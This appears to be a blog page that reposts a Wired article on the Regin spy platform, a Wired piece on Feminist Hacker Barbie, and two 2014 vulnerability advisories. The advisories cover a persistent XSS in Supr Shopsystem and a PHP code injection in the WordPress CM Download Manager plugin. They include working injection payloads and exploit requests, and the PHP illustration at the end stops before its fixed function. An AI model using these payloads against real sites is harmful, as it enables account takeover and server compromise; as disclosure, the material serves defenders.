MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

24 Nov 2014

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian telecom. In this case, too, the attack was sophisticated and complex. According to published news reports and documents leaked by Edward Snowden, the attackers targeted system administrators working for Belgacom and used their credentials to gain access to routers controlling the telecom’s cellular network. Belgacom publicly acknowledged the hack, but has never provided details about the breach.

Then five months after that announcement, news of another high-profile breach emerged—this one another sophisticated hack targeting prominent Belgian cryptographer Jean-Jacques Quisquater.

Now it appears that security researchers have found the massive digital spy tool used in all three attacks. Dubbed “Regin” by Microsoft, the platform has more than a hundred known victims to date, but there are likely many others still unknown. That’s because the espionage tool—a malicious platform capable of taking over entire networks and infrastructures—has been around since at least 2008, possibly even earlier, and is built to remain stealthy on a system for years.

The threat has been known since at least 2011, around the time the EU was hacked and some of the attack files made their way to Microsoft, which added detection for the component to its security software. Researchers with Kaspersky Lab only began tracking the threat in 2012, collecting bits and pieces of the massive threat. Symantec began investigating it in 2013 after some of its customers were infected. Putting together information from each, it’s clear the platform is highly complex and modular and can be customized with a wide range of capabilities depending on the target and the attackers’ needs. Researchers have found 50 payloads so far for stealing files and other data, but have evidence that still more exist.

“It’s a threat that everyone has detected for some time, but no one has exposed [until now],” says Eric Chien, technical director of Symantec’s Security Technology and Response division.

The Most Sophisticated Spy Tool Yet

The researchers have no doubt that Regin is a nation-state tool and are calling it the most sophisticated espionage machine uncovered to date—more complex even than the massive Flame platform, uncovered by Kaspersky and Symantec in 2012 and crafted by the same team who created Stuxnet.

“In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless,” writes Symantec in its report about Regin.

Though no one is willing to speculate on the record about Regin’s source, news reports about the Belgacom and Quisquater hacks pointed a finger at GCHQ and the NSA. Kaspersky confirms that Quisquater was infected with Regin, and other researchers familiar with the Belgacom attack have told WIRED that the description of Regin fits the malware that targeted the telecom, though the malicious files used in that attack were given a different name, based on something investigators found inside the platform’s main file.

Victims are located in multiple countries. Kaspersky has found them in Algeria, Afghanistan, Belgium, Brazil, Fiji, Germany, Iran, India, Malaysia, Syria, Pakistan, Russia and the small Pacific island nation of Kiribati. The majority of victims Symantec has tracked are located in Russia and Saudi Arabia.

Targets include entire networks, not just individuals, among them telecoms in multiple countries, as well as government agencies, research institutes and academics (particularly those doing advanced mathematics and cryptography, like Quisquater). Symantec has also found hotels infected. These are likely targeted for their reservation systems, which can provide valuable intelligence about visiting guests.

But perhaps the most significant aspect of Regin is its ability to target GSM base stations of cellular networks. The malicious arsenal includes a payload that Kaspersky says was used in 2008 to steal the usernames and passwords of system administrators of a telecom somewhere in the Middle East. Armed with these credentials, the attackers would have been able to access GSM base station controllers—the part of a cellular network that controls transceiver stations—to manipulate the systems or even install malicious code to monitor cellular traffic. They could also conceivably have shut down the cellular network—for example, during an invasion of the country or other unrest.

Kaspersky won’t identify the telecom or country where this GSM attack occurred, but suggests it’s either Afghanistan, Iran, Syria or Pakistan, as out of Kaspersky’s list of countries with Regin infections, only these four are in the region popularly considered the Middle East. Afghanistan stands out among the four, having been the only one cited in recent news stories about government hacking of GSM networks. Although most authorities would place it in South Asia, it is often popularly identified as being part of the Middle East.

Earlier this year, news reports based on documents leaked by Edward Snowden revealed two NSA operations codenamed MYSTIC and SOMALGET that involved hijacking the mobile network of several countries to collect metadata on every mobile call to and from these nations and, in at least two countries, to covertly record and store the full audio of calls. The countries where metadata was collected were identified as Mexico, Kenya, the Philippines and the island nation of the Bahamas. Countries where full audio was being recorded were identified as the Bahamas and Afghanistan.

The Path to Discovery

The Regin platform made its first public appearance in 2009 when someone uploaded components of the tool to the VirusTotal web site. VirusTotal is a free web site that aggregates dozens of anti-virus scanners. Researchers, and anyone else who finds a suspicious file on their system, can upload the file to the site to see if the scanners consider it malicious.

No one apparently noticed this upload in 2009, however. It wasn’t until March 9, 2011 that Microsoft appeared to take note, around the time that more files were uploaded to VirusTotal, and announced that the company had added detection for a trojan called Regin.A to its security software. The following day, it made the same announcement about a variant called Regin.B. Some in the security community believe the files uploaded to VirusTotal in 2011 might have come from the European Commission or from a security firm hired to investigate its breach.

Guido Vervaet, the EU Commission’s director of security who helped investigate the breach, wouldn’t discuss it other than to say it was “quite” extensive and very sophisticated, with a “complex architecture.” He says the attackers used a zero-day exploit to get in but wouldn’t say what vulnerability they attacked. The attack was uncovered by system administrators only when systems began malfunctioning. Asked if the attackers used the same malware that struck Belgacom, Vervaet couldn’t say for sure. “It was not one piece of software; it was an architecture [that] was not just one component but a series of elements working together. We have analyzed the architecture of the attack, which was quite sophisticated and similar to other cases that we know of in other organizations” but internally they were unable to come to any conclusion “that it was the same attack or the same wrongdoers.”

Vervaet wouldn’t say when the intrusion began or how long the invaders had been in the EU network, but documents released by Snowden last year discussed NSA operations that had targeted the EU Commission and Council. Those documents were dated 2010.

There are currently two known versions of the Regin platform in the wild. Version 1.0 dates back to at least 2008 but disappeared in 2011 the same year Microsoft released signatures to detect its trojan. Version 2.0 popped up in 2013, though it may have been used earlier than this. Researchers have found some Regin files with timestamps dating to 2003 and 2006, though it’s not clear if the timestamps are accurate.

Liam O’Murchu, senior manager in Symantec’s threat response group, says the threat landscape in 2008 was much different than it is today and this likely contributed to Regin remaining stealthy for so long. “I don’t think we realized attackers were working on this level until we saw things like Stuxnet and Duqu and we realized they’d been on this level for quite some time.” Those discoveries prompted researchers to begin looking for threats in different ways.

It’s unclear how the first infections occur. Neither Symantec nor Kaspersky has uncovered a dropper component (a phishing email containing an exploit that drops the malware onto a machine or entices victims to click on a malicious link), but based on evidence in one attack from 2011, Symantec thinks the attackers might have used a zero-day vulnerability in Yahoo Instant Messenger. But Chien says the attackers probably used multiple techniques to get into different environments. Reports about the hack of Belgacom describe a more sophisticated man-in-the-middle technique that involved using a rogue server to hijack the browser of Belgacom system administrators and redirect them to web pages the attackers controlled that infected their machines with malware.

Regardless of how it first gets into a machine, the Regin attack unfolds in five stages. Stages one through three load the attack and configure its architecture, while stages four and five launch the payloads. Among the payload options are a remote access trojan that gives the attackers backdoor access to infected systems, a keystroke logger and clipboard sniffer, a password sniffer, modules to collect information about USB devices connected to the infected system, and an email extraction module called U_STARBUCKS. Regin can also scan for deleted files and retrieve them.

The execution of components is orchestrated by an elaborate component that researchers have dubbed the “conductor.” This is “the brain of the whole platform,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis Team.

Regin uses a nested decrypting technique, decrypting itself in stages, with the key for decrypting each component in the component that precedes it. This made it difficult for researchers to examine the threat in the beginning when they didn’t have all of the components and all of the keys.

Regin also uses an unusual technique in some cases to hide its data, by storing it in the Extended Attributes portion of Windows. Extended Attributes is a storage area for metadata associated with files and directories, such as when a file was created or last altered or whether an executable program was downloaded from the internet (and therefore needs a prompt warning users before opening). Extended Attributes limits the size of data blocks it can store, so Regin splits the data it wants to store into separate encrypted chunks to hide them. When it needs to use this data, the conductor links the chunks together so they can execute like a single file.

The attackers also use a complex communication structure to manage the large scope of network-wide infections. Instead of communicating directly with the attackers’ command servers, each system talks only to other machines on the network and with a single node that acts as a hub to communicate with command servers. This reduces the amount of traffic leaving the network and the number of machines communicating with a strange server outside the network, which can draw suspicion. It also allows the attackers to communicate with systems inside the organization that might not even be connected to the internet.

‘It’s Totally Crazy’: The Middle-Eastern Hacks

The most elaborate and extensive infection Kaspersky saw that used this technique occurred in a Middle Eastern country the researchers decline to name. They call the infection “mind-blowing” and say in their report that it consisted of an elaborate web of networks the attackers infected and then linked together. These include networks for the office of the president of the country, a research center, an educational institute that from its name appears to be a mathematics institute, and a bank. In this case, instead of having each of the infected networks communicate with the attackers’ command server individually, the attackers set up an elaborate covert communication web between them so that commands and information passed between them as if through a peer-to-peer network. All of the infected networks then interfaced with one system at the educational institute, which served as a hub for communicating with the attackers.

“It’s totally crazy,” says Raiu. “The idea is to have one single control mechanism for the whole country so they can just run one command, and that command is replicated between all the members on the peer-to-peer network.”

The connections between infected machines and networks are encrypted, with each infected node using a public and private key to encrypt traffic exchanged between them.

Kaspersky refers to the educational institute as the “Magnet of Threats” because they found all sorts of other advanced threats infesting its network—including the well-known Mask malware and Turla—all co-existing peacefully with Regin.

But on par with this attack was one that occurred in another Middle East country against the GSM network of a large, unidentified telecom. The Kaspersky researchers say they found what appears to be an activity log the attackers used to collect commands and login credentials for one of the telecom’s GSM base station controllers. The log, about 70 KB in size, contains hundreds of commands sent to the base station controller between April 25 and May 27 of 2008. It’s unclear how many of the commands were sent by telecom administrators or by the attackers themselves in an attempt to control base stations.

The commands, which Kaspersky identified as Ericsson OSS MML commands, are used for checking the software version on a base station controller, retrieving a list of the call forwarding settings for the mobile station, enabling call forwarding, listing the transceiver route for a particular cell tower, activating and deactivating cell towers in the GSM network, and adding frequencies to the active list of frequencies used by the network. The log shows commands going to 136 different GSM cell sites—cell sites with names like prn021a, gzn010a, wdk004, and kbl027a. In addition to commands, the log also shows usernames and passwords for the telecom’s engineer accounts.

“They found a computer that manages a base station controller, and that base station controller is able to reach out to hundreds of cells,” says Raiu. He says there are two or three GSM operators in the targeted country and the one the attackers targeted is the largest. He doesn’t know if the others were infected as well.

Both of these infections—targeting the GSM network and the presidential network—appear to be ongoing. As news of the Regin attack spreads and more security firms add detection for it to their tools, the number of victims uncovered will no doubt grow.

http://www.wired.com/2014/11/mysteries-of-the-malware-regin/


23 Nov 2014

Feminist Hacker Barbie Is Just What Our Little Girls Need

There’s an illustrated book called “Barbie: I Can be a Computer Engineer,” and everyone we know hated it.

Packed with “Over 50 Stickers!,” it dreams up a computer engineering version of Barbie who seems better at taking praise for other people’s work than doing any actual coding. It prompted some serious outrage on the net this week because Barbie the computer engineer says things like “I’m only creating the design ideas” and “I’ll need Steven’s and Brian’s help to turn it into a game.” She also infects her sister’s computer, leans on these two guy friends to fix the problem, and then takes credit for their work. Bad Barbie!

Says blogger Pamela Ribon: “It’s a perfect example of the way women and girls are perceived to ‘understand’ the tech world, and how frustrating it can be when nobody believes this is how we’re treated.”

But the internet has fallen in love with Feminist Hacker Barbie. She’s the brainchild of Kathleen Tuite, an independent computer programmer based near Santa Cruz, California, who spent a half-day this week putting together a website where people could re-caption the original book, hacking it to fix all of its pastel-hued problems.

Tuite, who until recently was a University of Washington graduate student studying crowdsourcing, says she created the site out of disappointment and frustration with the official Barbie book. In the past few days, her Feminist Hacker Barbie has blossomed into a full-blown and extremely funny internet meme with thousands of captions, many of which we think would make great fodder for a real Barbie engineering movie.

These captions work so well because of the sheer ridiculousness of the original Barbie images. In one of them, Barbie inexplicably sits in front of three computers, her hands on two different machines simultaneously. About 2,700 of the captions were uploaded to Tuite’s website—and then someone discovered a bug in the Django code Tuite used to build the site. In short order, Feminist Hacker Barbie got hacked.

At first, someone started uploading photos of Free Software Foundation advocate Richard Stallman. After that came the porn. So Tuite pulled the plug on the uploads, but folks are free to create their own images and captions. And those have been popping up all over Twitter and Facebook for the past few days.

Tuite’s favorite so far is a picture from the book that includes a sample of the buggy code from her website—a sort of meta-cartoon, written as though Computer Engineer Barbie herself had unearthed the offending vulnerability.

Source: http://www.wired.com/2014/11/feminist-hacker-barbie-just-little-girls-need/

23 Nov 2014

Supr Shopsystem 5.1.0 Cross Site Scripting

Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
Release Date:
=============
2014-11-07
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
Common Vulnerability Scoring System:
====================================
3.1
 
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store owner to create their own online store very quickly and easily. 
Without installation or your own webspace you can begin creating products and content right after registration. With our 
free designs and the great customization options you can customize and adapt your shop to your ideas. You have to be an 
expert to work with the SUPR Shop.
 
( Copy of the Vendor Homepage: http://de.supr.com/tour )
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-11-05:  Public Disclosure (Vulnerability Laboratory)
 
Discovery Status:
=================
Published
 
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
 
Exploitation Technique:
=======================
Remote
 
Severity Level:
===============
Medium
 
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability allows remote attackers to execute persistent script code via forced client-side browser requests against a non-expired session, or via local POST injection.
 
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers can prepare client-side requests with malicious content to take over administrator accounts on interaction (a link click). 
Local attackers with privileged user accounts can also inject their own script code locally by manipulating the vulnerable setting_shopdetail 
POST request. The injected code is stored and executes before the error exception handling that should prevent it, so the check is evaded.
 
The error class with the exception is evaded because the request is processed, and the injected value executes, before the exception can prevent it.
Remote attackers can prepare a POST request that executes the code in one shot within the same-origin policy. The request can be injected locally to reproduce the issue, or prepared as a POST request that manipulates the values when a user with a non-expired session clicks, for example, a manipulated link.
 
The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirects to malicious sources and application-side manipulation of affected or connected module context.
 
Request Method(s):
          [+] POST
 
Vulnerable Module(s):
          [+] Dashboard > Settings > General > (setting_shopdetail)
 
Vulnerable Parameter(s):
          [+] blogname
          [+] blog/shop slogan
          [+] tags
 
Affected Module(s):
          [+] Dashboard (localhost:80/a/wp-admin/[x])
 
 
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with a low privileged application user account and low user interaction (a click).
For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.
 
PoC: Dashboard > Settings > General > (setting_shopdetail)
 
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
                                <div class="form-row field-error">
                    <div class="label">
                        <label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
                    </div>
                    <div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
 
<ul class="">
    <li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
 
Note: The error class with the exception is evaded because the request is processed, and the injected value executes, before the exception can prevent it.
Remote attackers can prepare a POST request that executes the code in one shot within the same-origin policy. The request can be injected locally to reproduce the issue, or prepared as a POST request that manipulates the values when a user with a non-expired session clicks, for example, a manipulated link.
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3; 
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1; 
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1; 
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
 __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
      setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      shopreg%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshopcategory%5D[]
      setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bemailfooter%5D[]
      setting_shopdata%5Binvoicenote%5D[]
      setting_shopdata%5Bshop_google_analytics_account%5D[]
      setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
      setting_shopdata%5Bsubmit%5D[save]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:22 GMT]
      Server[Apache/2.2.16 (Debian)]
      X-Powered-By[PHP/5.3.3-7+squeeze22]
      p3p[CP="CAO PSA OUR"]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
      Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Connection[close]
      Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK] 
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!] 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[283] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
 __utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
 wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
 __utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:24 GMT]
      Server[Apache/2.2.16 (Debian)]
      Content-Length[283]
      Keep-Alive[timeout=5, max=8]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=iso-8859-1]
 
 
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable setting_shopdetail values of the POST request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Set up the error exception handling ahead of the input mask so that it runs before the values are stored, and reconfigure it to capture the events correctly.
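The ordering defect described in the Technical Details (the value is persisted before the validation exception fires, so the user sees the "ungültige Zeichen" error while the injected value is already stored) and the two-part fix proposed above, as an added Python illustration that is not the product's own code. The field names follow the advisory's POST log; the settings store, the allowed-character rule and the sample POST body are constructed assumptions.

```python
import html
import re

# Constructed settings store standing in for the shop's saved general settings
# (an assumption; the product's real storage is not shown in the advisory).
CLEAN_SETTINGS = {"blogname": "My Shop", "blogdescription": "", "shoptags": ""}

# The three fields the advisory names as vulnerable (shop name, slogan, tags),
# keyed the way the advisory's POST log shows them.
FIELDS = ("blogname", "blogdescription", "shoptags")

# Constructed POST body: the advisory's decoded test string in every field.
INJECTED_POST = {
    f"setting_shopdata[{f}]": '"><iframe src=a onload=alert("VL") <' for f in FIELDS
}

# Allowed characters for these short text fields. This rule is an assumption
# that mirrors the advisory's "ungültige Zeichen" (invalid characters) error.
ALLOWED = re.compile(r"[\w \-.,!&']*")


def validate(field, value):
    """Return the German error message the advisory shows, or None if the value is fine."""
    if ALLOWED.fullmatch(value) is None:
        return f"Das Feld {field} enthält leider ungültige Zeichen!"
    return None


def save_settings_vulnerable(settings, post):
    """Reproduces the ordering defect the advisory describes: each value is
    persisted first, and only then does the validator report its error, so the
    user sees 'invalid characters' while the injected value is already stored."""
    errors = []
    for field in FIELDS:
        value = post.get(f"setting_shopdata[{field}]", "")
        settings[field] = value            # persisted before validation ...
        error = validate(field, value)     # ... so this error comes too late
        if error:
            errors.append(error)
    return errors


def save_settings_fixed(settings, post):
    """Validate every field first and persist only when all of them pass."""
    errors, pending = [], {}
    for field in FIELDS:
        value = post.get(f"setting_shopdata[{field}]", "")
        error = validate(field, value)
        if error:
            errors.append(error)
        else:
            pending[field] = value
    if not errors:
        settings.update(pending)           # nothing is written on a rejected request
    return errors


def render_blogname_input(settings):
    """Second layer: encode on output so a stored value can never close the
    value="..." attribute, which is exactly what the advisory's PoC form shows."""
    encoded = html.escape(settings["blogname"], quote=True)
    return (
        '<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" '
        f'value="{encoded}" type="text">'
    )


if __name__ == "__main__":
    store = dict(CLEAN_SETTINGS)
    print("vulnerable:", save_settings_vulnerable(store, INJECTED_POST), store["blogname"])
    store = dict(CLEAN_SETTINGS)
    print("fixed:", save_settings_fixed(store, INJECTED_POST), store["blogname"])
    print(render_blogname_input({"blogname": '"><iframe src=a'}))
```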
 
 
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by the 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list (feed), modify, use or edit our material, contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to obtain permission.
 
        Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
 
 
 
 
-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
 
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com


22Nov/14

WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in WordPress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and earlier
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
A code injection vulnerability has been found and confirmed within the software, exploitable as an anonymous user. A successful attack allows an anonymous attacker to gain full control of the application and to use any operating system functions available to the scripting environment. 
 
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)
 
 
public static function alterSearchQuery($search, $query)
    {
        if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
        {
            global $wpdb;
            $search_term = $_GET['CMDsearch'];
            if( !empty($search_term) )
            {
                $search = '';
                $query->is_search = true;
                // added slashes screw with quote grouping when done early, so done later
                $search_term = stripslashes($search_term);
                preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                $terms = array_map('_search_terms_tidy', $matches[0]);
 
                $n = '%';
                $searchand = ' AND ';
                foreach((array) $terms as $term)
                {
                    $term = esc_sql(like_escape($term));
                    $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                }
                // Injection point: $search_term comes straight from $_GET['CMDsearch'] and is compiled as PHP source
                add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                remove_filter('posts_request', 'relevanssi_prevent_default_request');
                remove_filter('the_posts', 'relevanssi_query');
            }
        }
        return $search;
}
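The request above hands the CMDsearch value to create_function(), which compiles its second argument as the body of a PHP function. With the advisory's value `".phpinfo()."` that body reads `return "".phpinfo()."";`, so the call executes whenever the filter function is invoked. The following is an added example, not code from the plugin or the ITAS advisory (the function names are mine): it puts the create_function() pattern next to a closure that carries the search term as data, and feeds both the same attacker-shaped value, using a harmless strrev() in place of phpinfo().

```php
<?php
// Added example; not code from the plugin or the ITAS advisory, and the
// function names are mine. It puts the plugin's create_function() pattern
// next to a closure that carries the search term as data, and feeds both
// the same attacker-shaped value.

/**
 * What the plugin does: the filter body is assembled as a string of PHP
 * source and compiled. create_function() was an eval() wrapper (deprecated
 * in PHP 7.2, removed in 8.0), so eval() is used here to show the same
 * behaviour. Keep this for inspection only; never run it on real input.
 */
function cmdm_vulnerable_filter(string $search_term): Closure {
    $body = 'return "' . $search_term . '";';   // identical to the plugin's second argument
    return eval('return function ($q) { ' . $body . ' };');
}

/**
 * The fix: a closure captures $search_term by value. No PHP source is built
 * from the request, so a quote in the input is just a quote.
 */
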